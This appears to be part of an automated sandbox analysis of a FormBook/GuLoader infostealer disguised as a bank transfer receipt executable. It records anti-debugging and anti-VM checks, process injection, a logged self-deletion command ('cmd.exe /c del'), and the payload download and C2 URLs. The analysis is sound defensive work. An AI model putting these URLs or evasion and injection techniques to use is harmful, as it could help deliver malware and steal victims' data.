        Source: nongrav.exe, 00000001.00000002.507837199.0000000002BBA000.00000004.00000001.sdmp, nongrav.exe, 0000000F.00000002.787120391.0000000002A5A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Data Exchange Service
        Source: nongrav.exe, 00000001.00000002.507837199.0000000002BBA000.00000004.00000001.sdmp, nongrav.exe, 0000000F.00000002.787120391.0000000002A5A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Heartbeat Service
        Source: nongrav.exe, 00000001.00000002.507837199.0000000002BBA000.00000004.00000001.sdmp, nongrav.exe, 0000000F.00000002.787120391.0000000002A5A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Service Interface
        Source: explorer.exe, 00000015.00000000.733803262.00000000086C9000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
        Source: nongrav.exe, 0000000F.00000002.787120391.0000000002A5A000.00000004.00000001.sdmp Binary or memory string: vmicheartbeat

        Anti Debugging:

        Hides threads from debuggers
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Thread information set: HideFromDebugger
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Thread information set: HideFromDebugger
        Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Code function: 0_2_00F32DAE GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,0_2_00F32DAE
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_004088C0 rdtsc 15_2_004088C0
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Process token adjusted: Debug
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EB905AC mov eax, dword ptr fs:[00000030h]15_2_1EB905AC
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EB905AC mov eax, dword ptr fs:[00000030h]15_2_1EB905AC
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EAF1DB5 mov eax, dword ptr fs:[00000030h]15_2_1EAF1DB5
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EAF1DB5 mov eax, dword ptr fs:[00000030h]15_2_1EAF1DB5
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EAF1DB5 mov eax, dword ptr fs:[00000030h]15_2_1EAF1DB5
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EAC2D8A mov eax, dword ptr fs:[00000030h]15_2_1EAC2D8A
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EAC2D8A mov eax, dword ptr fs:[00000030h]15_2_1EAC2D8A
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EAC2D8A mov eax, dword ptr fs:[00000030h]15_2_1EAC2D8A
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EAC2D8A mov eax, dword ptr fs:[00000030h]15_2_1EAC2D8A
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EAC2D8A mov eax, dword ptr fs:[00000030h]15_2_1EAC2D8A
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EAFA185 mov eax, dword ptr fs:[00000030h]15_2_1EAFA185
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EAEC182 mov eax, dword ptr fs:[00000030h]15_2_1EAEC182
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EAF2581 mov eax, dword ptr fs:[00000030h]15_2_1EAF2581
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EAF2581 mov eax, dword ptr fs:[00000030h]15_2_1EAF2581
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EAF2581 mov eax, dword ptr fs:[00000030h]15_2_1EAF2581
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EAF2581 mov eax, dword ptr fs:[00000030h]15_2_1EAF2581
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EAFFD9B mov eax, dword ptr fs:[00000030h]15_2_1EAFFD9B
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EAFFD9B mov eax, dword ptr fs:[00000030h]15_2_1EAFFD9B
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EAF2990 mov eax, dword ptr fs:[00000030h]15_2_1EAF2990
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EB78DF1 mov eax, dword ptr fs:[00000030h]15_2_1EB78DF1
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EACB1E1 mov eax, dword ptr fs:[00000030h]15_2_1EACB1E1
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EACB1E1 mov eax, dword ptr fs:[00000030h]15_2_1EACB1E1
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EACB1E1 mov eax, dword ptr fs:[00000030h]15_2_1EACB1E1
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EADD5E0 mov eax, dword ptr fs:[00000030h]15_2_1EADD5E0
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EADD5E0 mov eax, dword ptr fs:[00000030h]15_2_1EADD5E0
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EB8FDE2 mov eax, dword ptr fs:[00000030h]15_2_1EB8FDE2
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EB8FDE2 mov eax, dword ptr fs:[00000030h]15_2_1EB8FDE2
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EB8FDE2 mov eax, dword ptr fs:[00000030h]15_2_1EB8FDE2
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EB8FDE2 mov eax, dword ptr fs:[00000030h]15_2_1EB8FDE2
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EB541E8 mov eax, dword ptr fs:[00000030h]15_2_1EB541E8
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EB46DC9 mov eax, dword ptr fs:[00000030h]15_2_1EB46DC9
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EB46DC9 mov eax, dword ptr fs:[00000030h]15_2_1EB46DC9
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EB46DC9 mov eax, dword ptr fs:[00000030h]15_2_1EB46DC9
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EB46DC9 mov ecx, dword ptr fs:[00000030h]15_2_1EB46DC9
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EB46DC9 mov eax, dword ptr fs:[00000030h]15_2_1EB46DC9
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EB46DC9 mov eax, dword ptr fs:[00000030h]15_2_1EB46DC9
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EB8E539 mov eax, dword ptr fs:[00000030h]15_2_1EB8E539
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EB4A537 mov eax, dword ptr fs:[00000030h]15_2_1EB4A537
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EB98D34 mov eax, dword ptr fs:[00000030h]15_2_1EB98D34
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EAE4120 mov eax, dword ptr fs:[00000030h]15_2_1EAE4120
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EAE4120 mov eax, dword ptr fs:[00000030h]15_2_1EAE4120
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EAE4120 mov eax, dword ptr fs:[00000030h]15_2_1EAE4120
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EAE4120 mov eax, dword ptr fs:[00000030h]15_2_1EAE4120
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EAE4120 mov ecx, dword ptr fs:[00000030h]15_2_1EAE4120
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EAF4D3B mov eax, dword ptr fs:[00000030h]15_2_1EAF4D3B
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EAF4D3B mov eax, dword ptr fs:[00000030h]15_2_1EAF4D3B
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EAF4D3B mov eax, dword ptr fs:[00000030h]15_2_1EAF4D3B
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EAF513A mov eax, dword ptr fs:[00000030h]15_2_1EAF513A
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EAF513A mov eax, dword ptr fs:[00000030h]15_2_1EAF513A
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EAD3D34 mov eax, dword ptr fs:[00000030h]15_2_1EAD3D34
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EAD3D34 mov eax, dword ptr fs:[00000030h]15_2_1EAD3D34
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EAD3D34 mov eax, dword ptr fs:[00000030h]15_2_1EAD3D34
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EAD3D34 mov eax, dword ptr fs:[00000030h]15_2_1EAD3D34
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EAD3D34 mov eax, dword ptr fs:[00000030h]15_2_1EAD3D34
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EAD3D34 mov eax, dword ptr fs:[00000030h]15_2_1EAD3D34
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EAD3D34 mov eax, dword ptr fs:[00000030h]15_2_1EAD3D34
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EAD3D34 mov eax, dword ptr fs:[00000030h]15_2_1EAD3D34
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EAD3D34 mov eax, dword ptr fs:[00000030h]15_2_1EAD3D34
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EAD3D34 mov eax, dword ptr fs:[00000030h]15_2_1EAD3D34
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EAD3D34 mov eax, dword ptr fs:[00000030h]15_2_1EAD3D34
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EAD3D34 mov eax, dword ptr fs:[00000030h]15_2_1EAD3D34
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EAD3D34 mov eax, dword ptr fs:[00000030h]15_2_1EAD3D34
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EACAD30 mov eax, dword ptr fs:[00000030h]15_2_1EACAD30
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EAC9100 mov eax, dword ptr fs:[00000030h]15_2_1EAC9100
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EAC9100 mov eax, dword ptr fs:[00000030h]15_2_1EAC9100
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EAC9100 mov eax, dword ptr fs:[00000030h]15_2_1EAC9100
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EACC962 mov eax, dword ptr fs:[00000030h]15_2_1EACC962
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EAEC577 mov eax, dword ptr fs:[00000030h]15_2_1EAEC577
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EAEC577 mov eax, dword ptr fs:[00000030h]15_2_1EAEC577
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EACB171 mov eax, dword ptr fs:[00000030h]15_2_1EACB171
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EACB171 mov eax, dword ptr fs:[00000030h]15_2_1EACB171
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EAEB944 mov eax, dword ptr fs:[00000030h]15_2_1EAEB944
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EAEB944 mov eax, dword ptr fs:[00000030h]15_2_1EAEB944
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EB03D43 mov eax, dword ptr fs:[00000030h]15_2_1EB03D43
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EB43540 mov eax, dword ptr fs:[00000030h]15_2_1EB43540
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EAE7D50 mov eax, dword ptr fs:[00000030h]15_2_1EAE7D50
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03AA7016 mov eax, dword ptr fs:[00000030h]22_2_03AA7016
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03AA7016 mov eax, dword ptr fs:[00000030h]22_2_03AA7016
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03A4746D mov eax, dword ptr fs:[00000030h]22_2_03A4746D
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03AF1074 mov eax, dword ptr fs:[00000030h]22_2_03AF1074
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03AE2073 mov eax, dword ptr fs:[00000030h]22_2_03AE2073
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03A40050 mov eax, dword ptr fs:[00000030h]22_2_03A40050
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03A40050 mov eax, dword ptr fs:[00000030h]22_2_03A40050
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03ABC450 mov eax, dword ptr fs:[00000030h]22_2_03ABC450
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03ABC450 mov eax, dword ptr fs:[00000030h]22_2_03ABC450
        Source: C:\Windows\SysWOW64\svchost.exe; Process queried: DebugPort
        Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe; Code function: 0_2_00F35165 SetFileAttributesA,LdrResolveDelayLoadedAPI,LocalFree,LocalFree,SetCurrentDirectoryA
        Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe; Code function: 0_2_00F37360 SetUnhandledExceptionFilter
        Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe; Code function: 0_2_00F36C35 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess

        HIPS / PFW / Operating System Protection Evasion:

        Maps a DLL or memory area into another process
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe; Section loaded: unknown target: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe protection: execute and read and write
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe; Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe; Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\svchost.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
        Queues an APC in another process (thread injection)
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe; Thread APC queued: target process: C:\Windows\explorer.exe
        Modifies the context of a thread in another process (thread injection)
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe; Thread register set: target process: 3352
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe; Thread register set: target process: 3352
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe; Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe
        Source: C:\Windows\SysWOW64\svchost.exe; Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe"
        Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe; Code function: 0_2_00F315FC LoadLibraryA,GetProcAddress,AllocateAndInitializeSid,FreeSid,FreeLibrary
        Source: explorer.exe, 00000015.00000000.740986276.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 00000015.00000000.727918009.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 00000015.00000000.756092211.0000000000B68000.00000004.00000020.sdmp; Binary or memory string: Progman\Pr
        Source: explorer.exe, 00000015.00000000.741349189.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000015.00000000.756746468.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000015.00000000.728123965.00000000011E0000.00000002.00020000.sdmp; Binary or memory string: Program Manager
        Source: explorer.exe, 00000015.00000000.729737334.0000000005E10000.00000004.00000001.sdmp, explorer.exe, 00000015.00000000.741349189.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000015.00000000.756746468.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000015.00000000.728123965.00000000011E0000.00000002.00020000.sdmp; Binary or memory string: Shell_TrayWnd
        Source: explorer.exe, 00000015.00000000.741349189.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000015.00000000.756746468.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000015.00000000.728123965.00000000011E0000.00000002.00020000.sdmp; Binary or memory string: Progman
        Source: explorer.exe, 00000015.00000000.741349189.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000015.00000000.756746468.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000015.00000000.728123965.00000000011E0000.00000002.00020000.sdmp; Binary or memory string: Progmanlock
        Source: explorer.exe, 00000015.00000000.749218115.0000000008778000.00000004.00000001.sdmp, explorer.exe, 00000015.00000000.733926654.0000000008778000.00000004.00000001.sdmp; Binary or memory string: Shell_TrayWndh
        Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe; Code function: 0_2_00F375A8 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter
        Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe; Code function: 0_2_00F32A7E GetVersion,GetModuleHandleW,GetProcAddress,CloseHandle

        Stealing of Sensitive Information:

        Yara detected Generic Dropper
        Source: Yara match; File source: Process Memory Space: nongrav.exe PID: 4520, type: MEMORYSTR
        Source: Yara match; File source: Process Memory Space: svchost.exe PID: 6932, type: MEMORYSTR
        Yara detected FormBook
        Source: Yara match; File source: 00000015.00000000.748060468.00000000075FE000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara match; File source: 0000000F.00000002.786650349.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara match; File source: 0000000F.00000002.790144349.000000001E760000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000016.00000002.821009794.00000000035C0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match; File source: 00000015.00000000.763232148.00000000075FE000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000016.00000002.820935622.0000000003590000.00000040.00020000.sdmp, type: MEMORY
        GuLoader behavior detected
        Source: Initial file; Signature Results: GuLoader behavior

        Remote Access Functionality:

        Yara detected FormBook
        Source: Yara match; File source: 00000015.00000000.748060468.00000000075FE000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara match; File source: 0000000F.00000002.786650349.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara match; File source: 0000000F.00000002.790144349.000000001E760000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000016.00000002.821009794.00000000035C0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match; File source: 00000015.00000000.763232148.00000000075FE000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara match; File source: 00000016.00000002.820935622.0000000003590000.00000040.00020000.sdmp, type: MEMORY

        Mitre Att&ck Matrix

        Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
        Valid Accounts | Command and Scripting Interpreter 2 | Path Interception | Access Token Manipulation 1 | Virtualization/Sandbox Evasion 22 | Input Capture 1 | System Time Discovery 1 | Remote Services | Input Capture 1 | Exfiltration Over Other Network Medium | Encrypted Channel 21 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot 1
        Default Accounts | Native API 1 | Boot or Logon Initialization Scripts | Process Injection 312 | Access Token Manipulation 1 | LSASS Memory | Security Software Discovery 421 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
        Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection 312 | Security Account Manager | Virtualization/Sandbox Evasion 22 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
        Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Deobfuscate/Decode Files or Information 1 | NTDS | Process Discovery 2 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 113 | SIM Card Swap | | Carrier Billing Fraud
        Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Obfuscated Files or Information 4 | LSA Secrets | Application Window Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
        Replication Through Removable Media | Launchd | Rc.common | Rc.common | Rundll32 1 | Cached Domain Credentials | Remote System Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
        External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing 12 | DCSync | File and Directory Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
        Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | System Information Discovery 16 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

        Behavior Graph

        [Behavior graph image not preserved. Behavior Graph ID: 540355; Sample: Bank_Transfer_Receipt_Copy_...; Startdate: 15/12/2021; Architecture: WINDOWS; Score: 100. Process chain: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe (drops C:\Users\user\AppData\Local\...\nongrav.exe, PE32) -> nongrav.exe -> nongrav.exe (contacts drive.google.com 172.217.168.46:443, googlehosted.l.googleusercontent.com 172.217.168.1:443, doc-0c-ao-docs.googleusercontent.com) -> explorer.exe (injected) -> svchost.exe -> cmd.exe -> conhost.exe. rundll32.exe is started separately.]


        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        Source | Detection | Scanner | Label
        Bank_Transfer_Receipt_Copy_Scan#342 (5).exe | 15% | Metadefender |
        Bank_Transfer_Receipt_Copy_Scan#342 (5).exe | 27% | ReversingLabs | Win32.Trojan.Mucc
        Bank_Transfer_Receipt_Copy_Scan#342 (5).exe | 100% | Joe Sandbox ML |

        Dropped Files

        Source | Detection | Scanner | Label
        C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe | 100% | Joe Sandbox ML |

        Unpacked PE Files

        Source | Detection | Scanner | Label
        1.2.nongrav.exe.560000.1.unpack | 100% | Avira | TR/Dropper.Gen
        22.2.svchost.exe.3f3796c.4.unpack | 100% | Avira | TR/Dropper.Gen
        22.2.svchost.exe.3214020.1.unpack | 100% | Avira | TR/Dropper.Gen
        15.1.nongrav.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
        15.2.nongrav.exe.400000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

        Domains

        No Antivirus matches

        URLs

        Source | Detection | Scanner | Label
        www.thesocialmediacreator.com/i638/ | 5% | Virustotal |
        www.thesocialmediacreator.com/i638/ | 0% | Avira URL Cloud | safe

        Domains and IPs

        Contacted Domains

        Name | IP | Active | Malicious | Antivirus Detection | Reputation
        drive.google.com | 172.217.168.46 | true | false | | high
        googlehosted.l.googleusercontent.com | 172.217.168.1 | true | false | | high
        doc-0c-ao-docs.googleusercontent.com | unknown | unknown | false | | high

              Contacted URLs

              Name | Malicious | Antivirus Detection | Reputation
              https://doc-0c-ao-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ubf3t0pvfkcl5sqbkpotb7a08dnj393g/1639574025000/11789396277519397655/*/1Pq36Fq9yGHzam_FHR1D0IrFRVEBW3FSZ?e=download | false | | high
              www.thesocialmediacreator.com/i638/ | true | 5%, Virustotal; Avira URL Cloud: safe | low

                Contacted IPs

                Public

                IP | Domain | Country | ASN | ASN Name | Malicious
                172.217.168.46 | drive.google.com | United States | 15169 | GOOGLEUS | false
                172.217.168.1 | googlehosted.l.googleusercontent.com | United States | 15169 | GOOGLEUS | false

                General Information

                Joe Sandbox Version:34.0.0 Boulder Opal
                Analysis ID:540355
                Start date:15.12.2021
                Start time:14:09:29
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 12m 24s
                Hypervisor based Inspection enabled:false
                Report type:full
                Sample file name:Bank_Transfer_Receipt_Copy_Scan#342 (5).exe
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                Number of analysed new started processes analysed:24
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:1
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal100.troj.spyw.evad.winEXE@10/1@2/2
                EGA Information:Failed
                HDC Information:
                • Successful, ratio: 42.9% (good quality ratio 37.4%)
                • Quality average: 68.4%
                • Quality standard deviation: 34%
                HCA Information:
                • Successful, ratio: 69%
                • Number of executed functions: 116
                • Number of non-executed functions: 63
                Cookbook Comments:
                • Adjust boot time
                • Enable AMSI
                • Found application associated with file extension: .exe
                • Override analysis time to 240s for rundll32
                Warnings:
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                • Excluded IPs from analysis (whitelisted): 2.20.205.141
